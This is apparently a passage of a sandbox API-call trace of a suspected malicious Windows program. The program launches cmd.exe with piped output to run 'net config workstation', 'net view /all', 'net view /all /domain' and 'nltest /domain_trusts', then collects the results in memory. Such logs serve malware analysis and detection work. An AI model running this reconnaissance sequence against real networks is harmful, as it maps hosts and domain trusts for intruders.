	[0239.103] wvsprintfA (in: param_1=0x170edf8, param_2="\r\n\r\n", arglist=0x170f208 | out: param_1="\r\n\r\n") returned 4
	[0239.103] GetProcessHeap () returned 0x270000
	[0239.103] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x29a0b0, Size=0x265) returned 0x29a0b0
	[0239.103] MultiByteToWideChar (in: CodePage=0x1, dwFlags=0x0, lpMultiByteStr=0x29a0b0, cbMultiByte=613, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 613
	[0239.104] GetProcessHeap () returned 0x270000
	[0239.104] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x4ca) returned 0x29a320
	[0239.104] MultiByteToWideChar (in: CodePage=0x1, dwFlags=0x0, lpMultiByteStr=0x29a0b0, cbMultiByte=613, lpWideCharStr=0x29a320, cchWideChar=613 | out: lpWideCharStr="\x09\x09/c net config workstation\r\nComputer name                        \\\\ZGW5TDPU\r\nFull Computer name                   ZgW5tdPu\r\nUser name                            2XC7u663GxWc\r\n\r\nWorkstation active on                \r\n\x09NetBT_Tcpip_{D303B40D-CBB0-4CD4-933A-0697F06EA7C1} (000A916E33D9)\r\n\r\nSoftware version                     Windows 7 Professional\r\n\r\nWorkstation domain                   WORKGROUP\r\nLogon domain                         ZGW5TDPU\r\n\r\nCOM Open Timeout (sec)               0\r\nCOM Send Count (byte)                16\r\nCOM Send Timeout (msec)              250\r\nThe command completed successfully.\r\n\r\n\r\n\r\n") returned 613
	[0239.104] GetProcessHeap () returned 0x270000
	[0239.104] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x2ba5b0, Size=0x1d76) returned 0x2ba5b0
	[0239.104] GetProcessHeap () returned 0x270000
	[0239.104] HeapFree (in: hHeap=0x270000, dwFlags=0x8, lpMem=0x29a320 | out: hHeap=0x270000) returned 1
	[0239.104] GetProcessHeap () returned 0x270000
	[0239.104] HeapFree (in: hHeap=0x270000, dwFlags=0x8, lpMem=0x29a0b0 | out: hHeap=0x270000) returned 1
	[0239.104] CloseHandle (hObject=0x150) returned 1
	[0239.104] CloseHandle (hObject=0x14c) returned 1
	[0239.105] CloseHandle (hObject=0x160) returned 1
	[0239.105] CloseHandle (hObject=0x15c) returned 1
	[0239.106] CloseHandle (hObject=0x158) returned 1
	[0239.106] CloseHandle (hObject=0x154) returned 1
	[0239.106] CreatePipe (in: hReadPipe=0x170f7b4, hWritePipe=0x170f7a4, lpPipeAttributes=0x170f780, nSize=0x0 | out: hReadPipe=0x170f7b4*=0x154, hWritePipe=0x170f7a4*=0x158) returned 1
	[0239.107] SetHandleInformation (hObject=0x154, dwMask=0x1, dwFlags=0x0) returned 1
	[0239.107] CreatePipe (in: hReadPipe=0x170f7ac, hWritePipe=0x170f7a8, lpPipeAttributes=0x170f780, nSize=0x0 | out: hReadPipe=0x170f7ac*=0x15c, hWritePipe=0x170f7a8*=0x160) returned 1
	[0239.107] SetHandleInformation (hObject=0x160, dwMask=0x1, dwFlags=0x0) returned 1
	[0239.107] GetSystemDirectoryA (in: lpBuffer=0x170f618, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0239.107] lstrcatA (in: lpString1="C:\\Windows\\system32", lpString2="\\cmd.exe" | out: lpString1="C:\\Windows\\system32\\cmd.exe") returned="C:\\Windows\\system32\\cmd.exe"
	[0239.107] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c net view /all", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x170f720*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x15c, hStdOutput=0x158, hStdError=0x158), lpProcessInformation=0x170f770 | out: lpCommandLine="/c net view /all", lpProcessInformation=0x170f770*(hProcess=0x150, hThread=0x14c, dwProcessId=0xbb4, dwThreadId=0xbb8)) returned 1
	[0239.123] wvsprintfA (in: param_1=0x170edf4, param_2="\x09\x09%s\r\n", arglist=0x170f204 | out: param_1="\x09\x09/c net view /all\r\n") returned 20
	[0239.123] GetProcessHeap () returned 0x270000
	[0239.123] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x15) returned 0x29ac30
	[0239.123] PeekNamedPipe (in: hNamedPipe=0x154, lpBuffer=0x170f218, nBufferSize=0x400, lpBytesRead=0x170f7b0, lpTotalBytesAvail=0x170f76c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x170f218*, lpBytesRead=0x170f7b0*=0x0, lpTotalBytesAvail=0x170f76c*=0x0, lpBytesLeftThisMessage=0x0) returned 1
	[0239.123] Sleep (dwMilliseconds=0x2710) 
	[0249.133] PeekNamedPipe (in: hNamedPipe=0x154, lpBuffer=0x170f218, nBufferSize=0x400, lpBytesRead=0x170f7b0, lpTotalBytesAvail=0x170f76c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x170f218*, lpBytesRead=0x170f7b0*=0x0, lpTotalBytesAvail=0x170f76c*=0x0, lpBytesLeftThisMessage=0x0) returned 1
	[0249.133] Sleep (dwMilliseconds=0x2710) 
	[0249.148] PeekNamedPipe (in: hNamedPipe=0x154, lpBuffer=0x170f218, nBufferSize=0x400, lpBytesRead=0x170f7b0, lpTotalBytesAvail=0x170f76c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x170f218*, lpBytesRead=0x170f7b0*=0x0, lpTotalBytesAvail=0x170f76c*=0x0, lpBytesLeftThisMessage=0x0) returned 1
	[0249.148] Sleep (dwMilliseconds=0x2710) 
	[0249.164] PeekNamedPipe (in: hNamedPipe=0x154, lpBuffer=0x170f218, nBufferSize=0x400, lpBytesRead=0x170f7b0, lpTotalBytesAvail=0x170f76c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x170f218*, lpBytesRead=0x170f7b0*=0x0, lpTotalBytesAvail=0x170f76c*=0x0, lpBytesLeftThisMessage=0x0) returned 1
	[0249.164] Sleep (dwMilliseconds=0x2710) 
	[0249.207] PeekNamedPipe (in: hNamedPipe=0x154, lpBuffer=0x170f218, nBufferSize=0x400, lpBytesRead=0x170f7b0, lpTotalBytesAvail=0x170f76c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x170f218*, lpBytesRead=0x170f7b0*=0x0, lpTotalBytesAvail=0x170f76c*=0x0, lpBytesLeftThisMessage=0x0) returned 1
	[0249.207] Sleep (dwMilliseconds=0x2710) 
	[0249.210] PeekNamedPipe (in: hNamedPipe=0x154, lpBuffer=0x170f218, nBufferSize=0x400, lpBytesRead=0x170f7b0, lpTotalBytesAvail=0x170f76c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x170f218*, lpBytesRead=0x170f7b0*=0x0, lpTotalBytesAvail=0x170f76c*=0x0, lpBytesLeftThisMessage=0x0) returned 1
	[0249.211] Sleep (dwMilliseconds=0x2710) 
	[0249.226] PeekNamedPipe (in: hNamedPipe=0x154, lpBuffer=0x170f218, nBufferSize=0x400, lpBytesRead=0x170f7b0, lpTotalBytesAvail=0x170f76c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x170f218*, lpBytesRead=0x170f7b0*=0x0, lpTotalBytesAvail=0x170f76c*=0x0, lpBytesLeftThisMessage=0x0) returned 1
	[0249.226] Sleep (dwMilliseconds=0x2710) 
	[0249.242] PeekNamedPipe (in: hNamedPipe=0x154, lpBuffer=0x170f218, nBufferSize=0x400, lpBytesRead=0x170f7b0, lpTotalBytesAvail=0x170f76c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x170f218*, lpBytesRead=0x170f7b0*=0x0, lpTotalBytesAvail=0x170f76c*=0x0, lpBytesLeftThisMessage=0x0) returned 1
	[0249.242] Sleep (dwMilliseconds=0x2710) 
	[0249.257] PeekNamedPipe (in: hNamedPipe=0x154, lpBuffer=0x170f218, nBufferSize=0x400, lpBytesRead=0x170f7b0, lpTotalBytesAvail=0x170f76c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x170f218*, lpBytesRead=0x170f7b0*=0x0, lpTotalBytesAvail=0x170f76c*=0x0, lpBytesLeftThisMessage=0x0) returned 1
	[0249.257] Sleep (dwMilliseconds=0x2710) 
	[0249.274] PeekNamedPipe (in: hNamedPipe=0x154, lpBuffer=0x170f218, nBufferSize=0x400, lpBytesRead=0x170f7b0, lpTotalBytesAvail=0x170f76c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x170f218*, lpBytesRead=0x170f7b0*=0x0, lpTotalBytesAvail=0x170f76c*=0x0, lpBytesLeftThisMessage=0x0) returned 1
	[0249.274] Sleep (dwMilliseconds=0x2710) 
	[0249.290] PeekNamedPipe (in: hNamedPipe=0x154, lpBuffer=0x170f218, nBufferSize=0x400, lpBytesRead=0x170f7b0, lpTotalBytesAvail=0x170f76c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x170f218*, lpBytesRead=0x170f7b0*=0x0, lpTotalBytesAvail=0x170f76c*=0x0, lpBytesLeftThisMessage=0x0) returned 1
	[0249.290] Sleep (dwMilliseconds=0x2710) 
	[0249.304] PeekNamedPipe (in: hNamedPipe=0x154, lpBuffer=0x170f218, nBufferSize=0x400, lpBytesRead=0x170f7b0, lpTotalBytesAvail=0x170f76c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x170f218*, lpBytesRead=0x170f7b0*=0x0, lpTotalBytesAvail=0x170f76c*=0x0, lpBytesLeftThisMessage=0x0) returned 1
	[0249.305] Sleep (dwMilliseconds=0x2710) 
	[0249.320] wvsprintfA (in: param_1=0x170edf8, param_2="\r\n\r\n", arglist=0x170f208 | out: param_1="\r\n\r\n") returned 4
	[0249.321] GetProcessHeap () returned 0x270000
	[0249.321] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x29ac30, Size=0x18) returned 0x29ac70
	[0249.321] MultiByteToWideChar (in: CodePage=0x1, dwFlags=0x0, lpMultiByteStr=0x29ac70, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24
	[0249.321] GetProcessHeap () returned 0x270000
	[0249.321] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x30) returned 0x28b1f0
	[0249.321] MultiByteToWideChar (in: CodePage=0x1, dwFlags=0x0, lpMultiByteStr=0x29ac70, cbMultiByte=24, lpWideCharStr=0x28b1f0, cchWideChar=24 | out: lpWideCharStr="\x09\x09/c net view /all\r\n\r\n\r\n폂㗳") returned 24
	[0249.321] GetProcessHeap () returned 0x270000
	[0249.321] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x2ba5b0, Size=0x1da6) returned 0x2ba5b0
	[0249.321] GetProcessHeap () returned 0x270000
	[0249.321] HeapFree (in: hHeap=0x270000, dwFlags=0x8, lpMem=0x28b1f0 | out: hHeap=0x270000) returned 1
	[0249.321] GetProcessHeap () returned 0x270000
	[0249.321] HeapFree (in: hHeap=0x270000, dwFlags=0x8, lpMem=0x29ac70 | out: hHeap=0x270000) returned 1
	[0249.321] CloseHandle (hObject=0x15c) returned 1
	[0249.321] CloseHandle (hObject=0x160) returned 1
	[0249.321] CloseHandle (hObject=0x154) returned 1
	[0249.322] CloseHandle (hObject=0x158) returned 1
	[0249.322] CloseHandle (hObject=0x14c) returned 1
	[0249.322] CloseHandle (hObject=0x150) returned 1
	[0249.322] CreatePipe (in: hReadPipe=0x170f7b4, hWritePipe=0x170f7a4, lpPipeAttributes=0x170f780, nSize=0x0 | out: hReadPipe=0x170f7b4*=0x150, hWritePipe=0x170f7a4*=0x14c) returned 1
	[0249.322] SetHandleInformation (hObject=0x150, dwMask=0x1, dwFlags=0x0) returned 1
	[0249.322] CreatePipe (in: hReadPipe=0x170f7ac, hWritePipe=0x170f7a8, lpPipeAttributes=0x170f780, nSize=0x0 | out: hReadPipe=0x170f7ac*=0x158, hWritePipe=0x170f7a8*=0x154) returned 1
	[0249.322] SetHandleInformation (hObject=0x154, dwMask=0x1, dwFlags=0x0) returned 1
	[0249.322] GetSystemDirectoryA (in: lpBuffer=0x170f618, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0249.323] lstrcatA (in: lpString1="C:\\Windows\\system32", lpString2="\\cmd.exe" | out: lpString1="C:\\Windows\\system32\\cmd.exe") returned="C:\\Windows\\system32\\cmd.exe"
	[0249.323] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c net view /all /domain", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x170f720*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x158, hStdOutput=0x14c, hStdError=0x14c), lpProcessInformation=0x170f770 | out: lpCommandLine="/c net view /all /domain", lpProcessInformation=0x170f770*(hProcess=0x15c, hThread=0x160, dwProcessId=0xd70, dwThreadId=0xda4)) returned 1
	[0249.334] wvsprintfA (in: param_1=0x170edf4, param_2="\x09\x09%s\r\n", arglist=0x170f204 | out: param_1="\x09\x09/c net view /all /domain\r\n") returned 28
	[0249.334] GetProcessHeap () returned 0x270000
	[0249.334] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1d) returned 0x2b01d0
	[0249.334] PeekNamedPipe (in: hNamedPipe=0x150, lpBuffer=0x170f218, nBufferSize=0x400, lpBytesRead=0x170f7b0, lpTotalBytesAvail=0x170f76c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x170f218*, lpBytesRead=0x170f7b0*=0x0, lpTotalBytesAvail=0x170f76c*=0x0, lpBytesLeftThisMessage=0x0) returned 1
	[0249.334] Sleep (dwMilliseconds=0x2710) 
	[0249.335] PeekNamedPipe (in: hNamedPipe=0x150, lpBuffer=0x170f218, nBufferSize=0x400, lpBytesRead=0x170f7b0, lpTotalBytesAvail=0x170f76c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x170f218*, lpBytesRead=0x170f7b0*=0x0, lpTotalBytesAvail=0x170f76c*=0x0, lpBytesLeftThisMessage=0x0) returned 1
	[0249.335] Sleep (dwMilliseconds=0x2710) 
	[0249.351] PeekNamedPipe (in: hNamedPipe=0x150, lpBuffer=0x170f218, nBufferSize=0x400, lpBytesRead=0x170f7b0, lpTotalBytesAvail=0x170f76c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x170f218*, lpBytesRead=0x170f7b0*=0x0, lpTotalBytesAvail=0x170f76c*=0x0, lpBytesLeftThisMessage=0x0) returned 1
	[0249.351] Sleep (dwMilliseconds=0x2710) 
	[0249.367] PeekNamedPipe (in: hNamedPipe=0x150, lpBuffer=0x170f218, nBufferSize=0x400, lpBytesRead=0x170f7b0, lpTotalBytesAvail=0x170f76c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x170f218*, lpBytesRead=0x170f7b0*=0x0, lpTotalBytesAvail=0x170f76c*=0x0, lpBytesLeftThisMessage=0x0) returned 1
	[0249.367] Sleep (dwMilliseconds=0x2710) 
	[0249.385] PeekNamedPipe (in: hNamedPipe=0x150, lpBuffer=0x170f218, nBufferSize=0x400, lpBytesRead=0x170f7b0, lpTotalBytesAvail=0x170f76c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x170f218*, lpBytesRead=0x170f7b0*=0x0, lpTotalBytesAvail=0x170f76c*=0x0, lpBytesLeftThisMessage=0x0) returned 1
	[0249.385] Sleep (dwMilliseconds=0x2710) 
	[0249.406] PeekNamedPipe (in: hNamedPipe=0x150, lpBuffer=0x170f218, nBufferSize=0x400, lpBytesRead=0x170f7b0, lpTotalBytesAvail=0x170f76c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x170f218*, lpBytesRead=0x170f7b0*=0x0, lpTotalBytesAvail=0x170f76c*=0x0, lpBytesLeftThisMessage=0x0) returned 1
	[0249.406] Sleep (dwMilliseconds=0x2710) 
	[0249.413] PeekNamedPipe (in: hNamedPipe=0x150, lpBuffer=0x170f218, nBufferSize=0x400, lpBytesRead=0x170f7b0, lpTotalBytesAvail=0x170f76c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x170f218*, lpBytesRead=0x170f7b0*=0x0, lpTotalBytesAvail=0x170f76c*=0x0, lpBytesLeftThisMessage=0x0) returned 1
	[0249.413] Sleep (dwMilliseconds=0x2710) 
	[0249.441] PeekNamedPipe (in: hNamedPipe=0x150, lpBuffer=0x170f218, nBufferSize=0x400, lpBytesRead=0x170f7b0, lpTotalBytesAvail=0x170f76c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x170f218*, lpBytesRead=0x170f7b0*=0x0, lpTotalBytesAvail=0x170f76c*=0x0, lpBytesLeftThisMessage=0x0) returned 1
	[0249.441] Sleep (dwMilliseconds=0x2710) 
	[0249.444] PeekNamedPipe (in: hNamedPipe=0x150, lpBuffer=0x170f218, nBufferSize=0x400, lpBytesRead=0x170f7b0, lpTotalBytesAvail=0x170f76c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x170f218*, lpBytesRead=0x170f7b0*=0x0, lpTotalBytesAvail=0x170f76c*=0x0, lpBytesLeftThisMessage=0x0) returned 1
	[0249.445] Sleep (dwMilliseconds=0x2710) 
	[0249.461] PeekNamedPipe (in: hNamedPipe=0x150, lpBuffer=0x170f218, nBufferSize=0x400, lpBytesRead=0x170f7b0, lpTotalBytesAvail=0x170f76c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x170f218*, lpBytesRead=0x170f7b0*=0x0, lpTotalBytesAvail=0x170f76c*=0x0, lpBytesLeftThisMessage=0x0) returned 1
	[0249.461] Sleep (dwMilliseconds=0x2710) 
	[0249.476] PeekNamedPipe (in: hNamedPipe=0x150, lpBuffer=0x170f218, nBufferSize=0x400, lpBytesRead=0x170f7b0, lpTotalBytesAvail=0x170f76c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x170f218*, lpBytesRead=0x170f7b0*=0x0, lpTotalBytesAvail=0x170f76c*=0x0, lpBytesLeftThisMessage=0x0) returned 1
	[0249.476] Sleep (dwMilliseconds=0x2710) 
	[0249.491] PeekNamedPipe (in: hNamedPipe=0x150, lpBuffer=0x170f218, nBufferSize=0x400, lpBytesRead=0x170f7b0, lpTotalBytesAvail=0x170f76c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x170f218*, lpBytesRead=0x170f7b0*=0x0, lpTotalBytesAvail=0x170f76c*=0x0, lpBytesLeftThisMessage=0x0) returned 1
	[0249.491] Sleep (dwMilliseconds=0x2710) 
	[0249.507] wvsprintfA (in: param_1=0x170edf8, param_2="\r\n\r\n", arglist=0x170f208 | out: param_1="\r\n\r\n") returned 4
	[0249.507] GetProcessHeap () returned 0x270000
	[0249.507] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x2b01d0, Size=0x20) returned 0x2b0428
	[0249.507] MultiByteToWideChar (in: CodePage=0x1, dwFlags=0x0, lpMultiByteStr=0x2b0428, cbMultiByte=32, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 32
	[0249.507] GetProcessHeap () returned 0x270000
	[0249.507] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x40) returned 0x284908
	[0249.507] MultiByteToWideChar (in: CodePage=0x1, dwFlags=0x0, lpMultiByteStr=0x2b0428, cbMultiByte=32, lpWideCharStr=0x284908, cchWideChar=32 | out: lpWideCharStr="\x09\x09/c net view /all /domain\r\n\r\n\r\n쿯㗳") returned 32
	[0249.507] GetProcessHeap () returned 0x270000
	[0249.507] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x2ba5b0, Size=0x1de6) returned 0x2ba5b0
	[0249.507] GetProcessHeap () returned 0x270000
	[0249.507] HeapFree (in: hHeap=0x270000, dwFlags=0x8, lpMem=0x284908 | out: hHeap=0x270000) returned 1
	[0249.507] GetProcessHeap () returned 0x270000
	[0249.507] HeapFree (in: hHeap=0x270000, dwFlags=0x8, lpMem=0x2b0428 | out: hHeap=0x270000) returned 1
	[0249.507] CloseHandle (hObject=0x158) returned 1
	[0249.507] CloseHandle (hObject=0x154) returned 1
	[0249.507] CloseHandle (hObject=0x150) returned 1
	[0249.507] CloseHandle (hObject=0x14c) returned 1
	[0249.507] CloseHandle (hObject=0x160) returned 1
	[0249.507] CloseHandle (hObject=0x15c) returned 1
	[0249.507] CreatePipe (in: hReadPipe=0x170f7b4, hWritePipe=0x170f7a4, lpPipeAttributes=0x170f780, nSize=0x0 | out: hReadPipe=0x170f7b4*=0x15c, hWritePipe=0x170f7a4*=0x160) returned 1
	[0249.507] SetHandleInformation (hObject=0x15c, dwMask=0x1, dwFlags=0x0) returned 1
	[0249.507] CreatePipe (in: hReadPipe=0x170f7ac, hWritePipe=0x170f7a8, lpPipeAttributes=0x170f780, nSize=0x0 | out: hReadPipe=0x170f7ac*=0x14c, hWritePipe=0x170f7a8*=0x150) returned 1
	[0249.508] SetHandleInformation (hObject=0x150, dwMask=0x1, dwFlags=0x0) returned 1
	[0249.508] GetSystemDirectoryA (in: lpBuffer=0x170f618, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0249.508] lstrcatA (in: lpString1="C:\\Windows\\system32", lpString2="\\cmd.exe" | out: lpString1="C:\\Windows\\system32\\cmd.exe") returned="C:\\Windows\\system32\\cmd.exe"
	[0249.508] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c nltest /domain_trusts", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x170f720*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x14c, hStdOutput=0x160, hStdError=0x160), lpProcessInformation=0x170f770 | out: lpCommandLine="/c nltest /domain_trusts", lpProcessInformation=0x170f770*(hProcess=0x158, hThread=0x154, dwProcessId=0xed0, dwThreadId=0xec8)) returned 1
	[0249.513] wvsprintfA (in: param_1=0x170edf4, param_2="\x09\x09%s\r\n", arglist=0x170f204 | out: param_1="\x09\x09/c nltest /domain_trusts\r\n") returned 28
	[0249.513] GetProcessHeap () returned 0x270000
	[0249.513] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1d) returned 0x2b0428
	[0249.513] PeekNamedPipe (in: hNamedPipe=0x15c, lpBuffer=0x170f218, nBufferSize=0x400, lpBytesRead=0x170f7b0, lpTotalBytesAvail=0x170f76c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x170f218*, lpBytesRead=0x170f7b0*=0x0, lpTotalBytesAvail=0x170f76c*=0x0, lpBytesLeftThisMessage=0x0) returned 1
	[0249.513] Sleep (dwMilliseconds=0x2710) 
	[0249.523] PeekNamedPipe (in: hNamedPipe=0x15c, lpBuffer=0x170f218, nBufferSize=0x400, lpBytesRead=0x170f7b0, lpTotalBytesAvail=0x170f76c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x170f218*, lpBytesRead=0x170f7b0*=0x0, lpTotalBytesAvail=0x170f76c*=0x0, lpBytesLeftThisMessage=0x0) returned 1
	[0249.523] Sleep (dwMilliseconds=0x2710) 
	[0249.538] PeekNamedPipe (in: hNamedPipe=0x15c, lpBuffer=0x170f218, nBufferSize=0x400, lpBytesRead=0x170f7b0, lpTotalBytesAvail=0x170f76c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x170f218*, lpBytesRead=0x170f7b0*=0x0, lpTotalBytesAvail=0x170f76c*=0x0, lpBytesLeftThisMessage=0x0) returned 1
	[0249.538] Sleep (dwMilliseconds=0x2710) 
	[0249.554] PeekNamedPipe (in: hNamedPipe=0x15c, lpBuffer=0x170f218, nBufferSize=0x400, lpBytesRead=0x170f7b0, lpTotalBytesAvail=0x170f76c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x170f218*, lpBytesRead=0x170f7b0*=0x0, lpTotalBytesAvail=0x170f76c*=0x0, lpBytesLeftThisMessage=0x0) returned 1
	[0249.554] Sleep (dwMilliseconds=0x2710) 
	[0249.572] PeekNamedPipe (in: hNamedPipe=0x15c, lpBuffer=0x170f218, nBufferSize=0x400, lpBytesRead=0x170f7b0, lpTotalBytesAvail=0x170f76c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x170f218*, lpBytesRead=0x170f7b0*=0x0, lpTotalBytesAvail=0x170f76c*=0x0, lpBytesLeftThisMessage=0x0) returned 1
	[0249.572] Sleep (dwMilliseconds=0x2710) 
	[0249.597] PeekNamedPipe (in: hNamedPipe=0x15c, lpBuffer=0x170f218, nBufferSize=0x400, lpBytesRead=0x170f7b0, lpTotalBytesAvail=0x170f76c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x170f218*, lpBytesRead=0x170f7b0*=0x0, lpTotalBytesAvail=0x170f76c*=0x0, lpBytesLeftThisMessage=0x0) returned 1
	[0249.597] Sleep (dwMilliseconds=0x2710) 
	[0249.600] PeekNamedPipe (in: hNamedPipe=0x15c, lpBuffer=0x170f218, nBufferSize=0x400, lpBytesRead=0x170f7b0, lpTotalBytesAvail=0x170f76c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x170f218*, lpBytesRead=0x170f7b0*=0x0, lpTotalBytesAvail=0x170f76c*=0x0, lpBytesLeftThisMessage=0x0) returned 1
	[0249.600] Sleep (dwMilliseconds=0x2710) 
	[0249.617] PeekNamedPipe (in: hNamedPipe=0x15c, lpBuffer=0x170f218, nBufferSize=0x400, lpBytesRead=0x170f7b0, lpTotalBytesAvail=0x170f76c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x170f218*, lpBytesRead=0x170f7b0*=0x0, lpTotalBytesAvail=0x170f76c*=0x0, lpBytesLeftThisMessage=0x0) returned 1
	[0249.617] Sleep (dwMilliseconds=0x2710) 
	[0249.795] PeekNamedPipe (in: hNamedPipe=0x15c, lpBuffer=0x170f218, nBufferSize=0x400, lpBytesRead=0x170f7b0, lpTotalBytesAvail=0x170f76c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x170f218*, lpBytesRead=0x170f7b0*=0x0, lpTotalBytesAvail=0x170f76c*=0x0, lpBytesLeftThisMessage=0x0) returned 1
	[0249.795] Sleep (dwMilliseconds=0x2710) 
	[0249.806] PeekNamedPipe (in: hNamedPipe=0x15c, lpBuffer=0x170f218, nBufferSize=0x400, lpBytesRead=0x170f7b0, lpTotalBytesAvail=0x170f76c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x170f218*, lpBytesRead=0x170f7b0*=0x0, lpTotalBytesAvail=0x170f76c*=0x0, lpBytesLeftThisMessage=0x0) returned 1
	[0249.806] Sleep (dwMilliseconds=0x2710) 
	[0249.819] PeekNamedPipe (in: hNamedPipe=0x15c, lpBuffer=0x170f218, nBufferSize=0x400, lpBytesRead=0x170f7b0, lpTotalBytesAvail=0x170f76c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x170f218*, lpBytesRead=0x170f7b0*=0x0, lpTotalBytesAvail=0x170f76c*=0x0, lpBytesLeftThisMessage=0x0) returned 1
	[0249.819] Sleep (dwMilliseconds=0x2710) 
	[0249.835] PeekNamedPipe (in: hNamedPipe=0x15c, lpBuffer=0x170f218, nBufferSize=0x400, lpBytesRead=0x170f7b0, lpTotalBytesAvail=0x170f76c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x170f218*, lpBytesRead=0x170f7b0*=0x0, lpTotalBytesAvail=0x170f76c*=0x0, lpBytesLeftThisMessage=0x0) returned 1
	[0249.835] Sleep (dwMilliseconds=0x2710) 
	[0249.850] wvsprintfA (in: param_1=0x170edf8, param_2="\r\n\r\n", arglist=0x170f208 | out: param_1="\r\n\r\n") returned 4
	[0249.850] GetProcessHeap () returned 0x270000
	[0249.850] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x2b0428, Size=0x20) returned 0x2b01d0
	[0249.850] MultiByteToWideChar (in: CodePage=0x1, dwFlags=0x0, lpMultiByteStr=0x2b01d0, cbMultiByte=32, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 32
	[0249.850] GetProcessHeap () returned 0x270000
	[0249.850] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x40) returned 0x284908
	[0249.850] MultiByteToWideChar (in: CodePage=0x1, dwFlags=0x0, lpMultiByteStr=0x2b01d0, cbMultiByte=32, lpWideCharStr=0x284908, cchWideChar=32 | out: lpWideCharStr="\x09\x09/c nltest /domain_trusts\r\n\r\n\r\n쿯㗳") returned 32
	[0249.850] GetProcessHeap () returned 0x270000
	[0249.850] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x2ba5b0, Size=0x1e26) returned 0x2ba5b0
	[0249.850] GetProcessHeap () returned 0x270000
